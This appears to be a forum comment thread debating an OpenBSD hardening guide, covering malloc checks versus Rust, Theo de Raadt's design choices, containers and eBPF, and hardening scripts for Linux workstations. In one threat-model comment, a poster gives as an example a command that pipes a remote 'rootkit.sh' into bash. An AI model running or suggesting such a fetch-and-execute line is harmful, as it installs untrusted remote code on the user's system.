So there's one idea that set me thinking: that actually sounds reasonable, even if inconvenient - remove yourself from wheel/doas/sudo, and switch VTs to escalate privileges. This is more secure because no software running as an unprivileged user could simulate the physical keystrokes needed for the VT switch. But why does it have to be so inconvenient - what if we could eat the cake and have it too? Maybe just require pressing a certain key combo on the physical keyboard whenever su/doas/sudo prompts for a password?
Then I remembered! Windows NT did exactly that: you had to press ctrl+alt+del to log in.
"The OpenBSD malloc system allows you to enable some extra checks, like use after free, heap overflow or guard pages..."
How would the added protection compare to the safety of Rust?
Wouldn't it be useful to develop C on a memory hardened system, then deploy anywhere knowing there were checks during development? Would that help avoid the memory issues later in production?
Rust's borrow checker does not only check heap memory, it checks pointers (references in Rust terminology) to anywhere. Additionally, these checks in malloc are at runtime, whereas the borrow checker is at compile time.
These checks are good, but they do not go as far as Rust does in terms of statically preventing issues.
> Wouldn't it be useful to develop C on a memory hardened system, then deploy anywhere knowing there were checks during development? Would that help avoid the memory issues later in production?
It helps but one aspect of runtime vs compile time checking is that for runtime checks, you only get the checks if you actually exercise the code path that causes the issue. If you ship with some checks on in development, and turn them off in release, you run the risk of having missed cases that will still cause problems.
All of this is better than doing nothing at all, and is a good thing.
At one point, SELinux being on by default made one of the Red Hat distros a pain. This high-friction first impression cost them some adoptions, when an IT manager did a test install. A "softening guide" might've helped.
IIRC, the managers were qualified sales leads who were actively looking to move to a supported Linux platform, but got turned off by the installer-and-docs out-of-box experience, which seemed like it was going to make a lot of extra work for them.
I just meant the "softening guide" might've helped from the perspective of the company who'd like to land those customers. I don't think it's the best way, but at the right moment it might've salvaged some sales.
You may be describing OpenBSD ("secure by default") and its FAQ (how to do what you want with it). The OP's hardening guide might be largely seen as going to greater lengths than most people need. (I use its advice about umask, though.)
That sort of hardened environment is what I would expect the sysadmins/operators of the darknet marketplaces to run.
Home directories in memory, proxied outbound SSH connections, high levels of encryption and absolute minimum installed software to do the job required.
The consequences of OpSec failure are... well, rather serious :)
> That isn’t what they do though. Defcon 30 shared what an actual Darknet user did.
and he got arrested, and did actual prison time. now it sounds like it wasn't all his technical opsec that got him in trouble, but just cuz some dude played fast and loose doesn't mean they all do.
the ones who ain't been caught are probably a lot stricter... or a lot more lucky.
The NSA had a hardening guide you could download for free and deploy on a Windows system if you so desired.
Following all of the advice in the document was an excellent way to end up with a completely useless system. Worse, thanks to Windows' horrible logging infrastructure it was almost impossible to figure out exactly which change was causing a particular bit of breakage. You never EVER get an error message that reads anything like 'HKLM\SYSTEM\CurrentControlSet\Services\Ramdisk: Permission Denied reading key "StartOverride", service halted'.
Instead it is some generic "the system failed to start" message that doesn't help at all.
Lesson one: Security is a spectrum. There is a difference between "No exploits in our base installation" and "The top nation-states of the world may be trying to load software of unknown capability onto my networked computer".
If Iran had been running their SCADA stuff on hardened OpenBSD systems instead of Windows, maybe the story would have been different though. I'm not saying it's realistic (SCADA drivers may not exist for OpenBSD): what I'm saying though is that only a fool would consider Windows as secure as OpenBSD.
Don't forget the most important security considerations: (1) choose a hardware and OS combination where none of your I/O hardware (video, audio, wifi, etc.) is supported, so that it can never be used to exploit your system; (2) choose an OS so obscure and weird that a potential hacker is guaranteed to have never even heard of it, and would need to study your specific machine for months to make heads or tails of it
Unsupported devices can always become somehow supported and enabled. To harden a computer, you remove WiFi cards, cut on-board antennas, desolder mics and speakers, desolder USB ports...
I did that for a computer that was used to sign Bitcoin transactions offline. The user typed hashes manually...
> Unsupported devices can always become somehow supported and enabled
Be very careful if anonymous developers suddenly contribute OpenBSD drivers for every single component in the 20 year old garage sale laptop you use for hosting an "online store" on TOR
One thing I've encountered working with OpenBSD is: change the defaults at your peril. The base system is intended to work and be secure as-is. If you start "hardening" it, expect odd breakage here and there and you will get little sympathy or help from the email lists.
Yes, I did know that, was just a general caution that before you go twisting knobs, be sure you understand what they do and are prepared to diagnose yourself any issues that result.
I hung out with Theo and his team years ago at a security conference. At the time, Subversion was the new hotness, sweeping away CVS as the source code management system du jour. I asked Theo why they hadn't already moved to Subversion. His answer stuck with me: CVS is dead simple, everyone understands it, and it just works. Why complicate things?
And that’s the philosophy behind much of OpenBSD. They focus on being able to understand everything from the build tools to the command line tools. Nothing random ever makes its way into OpenBSD (aside from the random number generator, which is ubiquitous). Only a few chosen hands ever commit a line of code to their holy codebase.
They seem to focus on correctness over features. Jails, for example, would add a lot of complexity.
Rust, if I am not mistaken, has some quirk with the compiler backend that OpenBSD does not like.
Theo also mentioned:
>Such ecosystems come with incredible costs. For instance, rust cannot even compile itself on i386 at present time because it exhausts the address space.
Regardless: The system being secure is a secondary benefit to it being comprehensible and coherent to an individual. It's not enough for the output of a magic box to be a better widget, even if the widget is better in every measurable way. The box itself must not be magic.
Using a static code analyzer, as well as adoption of Rust (which reduces the need for a static code analyzer) - squarely fit in the correctness camp, no?
Note: I'm not a Rust fanboy. But it just seems like Rust aligns very well with OpenBSD core principles.
The Rust thing comes up all the time, and Theo has already addressed the issue[1]. Basically it boils down to speed and the fact that OpenBSD runs on some pretty slow hardware and requires the full OS to be built on actual hardware.
As for the immutable OS, OpenBSD went the other direction and relinks the kernel on each boot.
> the fact that OpenBSD runs on some pretty slow hardware
This is one of my favorite aspects of OpenBSD. I play with a lot of retro hardware and running OpenBSD is an excellent way to make any old hardware feel like new.
Oldest real hardware I've run it on is a 486 DX2-66, oldest virtual hardware was a 386 using OpenBSD 4.1. Also ran a Pentium MMX as a WiFi router for a few weeks while sourcing a replacement.
Despite the "i386" name I don't think contemporary OpenBSD will work on a real 80386 or 80486 system. The supported hardware is described as: "All CPUs compatible with the Intel Pentium or later, with Intel-compatible hardware floating point support should work."
There is also a note: "Due to the increased usage of OpenBSD/amd64, as well as the age and practicality of most i386 hardware, only easy and critical security fixes are backported to i386. The project has more important things to focus on."
I would guess they are not too far from dropping support entirely, but as I understand it that all depends on whether there are any developers interested in still working on it. The OpenBSD developers build the OS for themselves. They make it freely available to anyone who finds it useful, but they do not really build it for "the users."
You're correct, 386 support was dropped after OpenBSD 4.1 (May 2007), and 486 support was dropped after 6.8 (October 2020). If I recall correctly, the project compiler changed after 6.8 and wasn't able to build the entire ports tree when targeting the 486, so they now target Pentium (i586) and higher.
Even though it's technically out-of-date and unsupported, an OpenBSD release from 2020 is still pretty impressive for the DX2 (1993). :)
For a project with such limited resources as OpenBSD, it seems wise for them to drop support for a large number of these legacy platforms and focus on more widely used architectures.
I understand that supporting more architectures actually helps uncover more bugs. But you could still do that with a supported platform list half that size.
Look at what DragonFlyBSD has been able to accomplish: truly competitive with Linux regarding performance and features, with the smallest development team of all the BSDs.
They can do this in large part because they focus on only one platform (x86-64).
But it isn’t a business that can shuffle human resources at will.
Your point reminds me of Theo losing his shit about how long it took me to build the CD release images I was responsible for. Poor machine crunched for more than a week to do it.
Over the years they have dropped support for a number of platforms[1], but they don't do it based on "popularity" but more whether there are developers (with hardware available) who are interested in working on it.
Not to deny that some of those are useful suggestions, but they don't square with the core OpenBSD philosophy. And despite not having these items, they are more secure than products that use them.
It is hard to call OpenBSD an OS focused on security. Beyond pledge, their primary focus seems to be "just implement everything correctly and don't run malware". If some utility has an implementation error, or you do accidentally run something malicious, you are hosed. Compare this to Linux with its extensive use of containerization and things like eBPF for dynamic security measures, or portals as part of Flatpak for dynamic application permissions.
> Compare this to Linux with the extensive use of containerization and things like eBPF for dynamic security measures
I think it's an interesting comparison study and I'm not convinced either way of The Right Approach. OpenBSD takes the approach "keep the attack surface as small as possible" while Linux takes the approach "let's bolt a bunch of layers together... good luck making your way through all of it"
So many misconceptions in the same answer. eBPF is for observability, and letting you run privileged programs inside the kernel space (even with protections) can actually increase the potential attack surface. Containerization is not and was never a security measure.
Most of your comment is bullshit. Containers are not for security but for convenience and task separation/isolation, to avoid the overhead of a VM. eBPF will expose you further, not less. Also, how can Flatpak secure you against a ~/.profile script run at login, or an ~/.xprofile one?
A malicious program is going to have a difficult time adding something to your ~/.profile script if it cannot access your home directory. Although I don't doubt that many Flatpak programs have overly lenient default permissions, and the various Xorg lack-of-isolation issues are unfortunately only somewhat remedied in Wayland.
Wayland does not stop a process from manipulating the home directory, doing various things on the network, using a ton of memory, recording what other processes exist etc. Once you add all that stuff you start to get something that looks a lot like containers.
By running OpenBSD as a workstation you've already made sure that 99% wouldn't connect with you /redditmode
This guide is partly Security 101, partly for a localhost admin. Things are different when you run an organization with a centrally managed catalogue. Or you are sane and have a clear picture of the attack vectors.
Least privilege? Yes, of course.
Drop inbound by default? Yes, of course - and it's amazing how many self-titled Linux Administrators insist that the machine should be 'secure from the start so no firewall is needed'. Also, this guide implies a workstation, which raises the question of exactly what kind of malicious traffic a [single] OpenBSD machine on the network would receive.
Drop outbound by default? Yes, and BTW it's pretty easy on Windows, because the Windows Defender Firewall (what a mouthful) is quite capable of filtering by application, not just by IPs and ports, so you don't need this ersatz SOCKS application firewall.
> Live in a temporary file-system
Now this is just ridiculous. As others said, this is Silk Road levels of paranoia.
> Disable webcam and microphone
Don't connect them in the first place?
> Disabling USB ports
See the temporary file-system. Good luck finding a notebook with PS/2 or serial ports.
> auto-updating the packages and base system daily on a computer is the minimum that should be done everywhere
Oh god.
> 10.1. Specialized proxies
> It could be possible to have different proxy users, with each restriction to the remote ports allowed, we could imagine proxies like
> Of course, this is even more tedious than the multipurpose proxy, but at least, it's harder for a program to guess what proxy to use, especially if you don't connect them all at once.
Now this is what bugs me most of this guide.
If you already allowed something to run on your machine then it is usually too late for security through obscurity exercises. Most of the things advised here would just make your life miserable and would lead to disabling or shortcutting them.
I'm surprised that not only is there no application firewall for any of the BSDs, there doesn't even seem to be any need for it. There is OpenSnitch, but only for Linux.
Maybe the closest things are chroot jails and pledge/unveil, both of which are application-specific or built in to the package. (I'm agreeing with you.)
What is the attack vector? Network, physical, both?
Who is the perpetrator? Nation, criminal, NSA, FSB, your disgruntled employee or your {business,sexual} partner trying to bury you?
Who is the operator of this machine? Do you trust him, or explicitly not? Does he run 'curl https://haxx.me/rootkit.sh | bash' every day?
What about maid service?
What services or data are on the machine? Can it be triggered to execute something from a 3rd-party endpoint? Does the data come from uncontrolled endpoints (e.g. the Internet, but that is not the only vector)?
BTW for those who want to learn... All of these (and more) are also applicable to Linux.
I'm running very hardened Linux "workstations" and things, once set up, just work. I created a shell script that verifies lots and lots of things and warns me if I forgot to harden something. I then simply re-run my script every time I install a new Linux (which is not that often). The script even modifies config files for me:
Setting xyz-fribulator is set to 0 although it should be set to 2, do you want me to modify xxx.cfg for you? [Y/N]
Makes hardening a new system a breeze.
For example I really don't see why a user should see processes belonging to other users. I've got about 30 settings like that, plus a beefy firewall, plus, as in TFA, a "no sudo / no doas" from the regular user rule.
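The "users shouldn't see other users' processes" item maps, on Linux, to the `hidepid` mount option for /proc. A minimal fstab fragment (assuming a classic fstab setup; `hidepid=2` hides processes you don't own, and the optional `gid=` exemption group for monitoring tools is omitted here):

```
# /etc/fstab: remount /proc so each user only sees their own processes
proc  /proc  proc  defaults,hidepid=2  0  0
```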